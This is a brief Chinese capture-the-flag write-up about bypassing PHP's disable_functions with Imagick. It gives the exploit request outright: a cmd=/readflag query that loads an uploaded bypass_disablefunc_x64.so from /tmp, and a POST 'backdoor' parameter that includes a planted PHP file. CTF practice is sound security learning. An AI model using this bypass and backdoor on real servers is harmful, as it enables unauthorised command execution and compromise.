前言
关键字:[disable_function|Imagick]
题解
提示可以说是十分明显了,利用imagick去disable_function bypass
用imagick函数,
在open_basedir处上传文件
然后
?cmd=/readflag&outpath=/tmp/d0d3c007f47b85e47c312ef8e20c88e6/xx&sopath=/tmp/d0d3c007f47b85e47c312ef8e20c88e6/bypass_disablefunc_x64.so
POST:backdoor=include('/tmp/d0d3c007f47b85e47c312ef8e20c88e6/1.php');
站在巨人的肩膀上就是轻松鸭。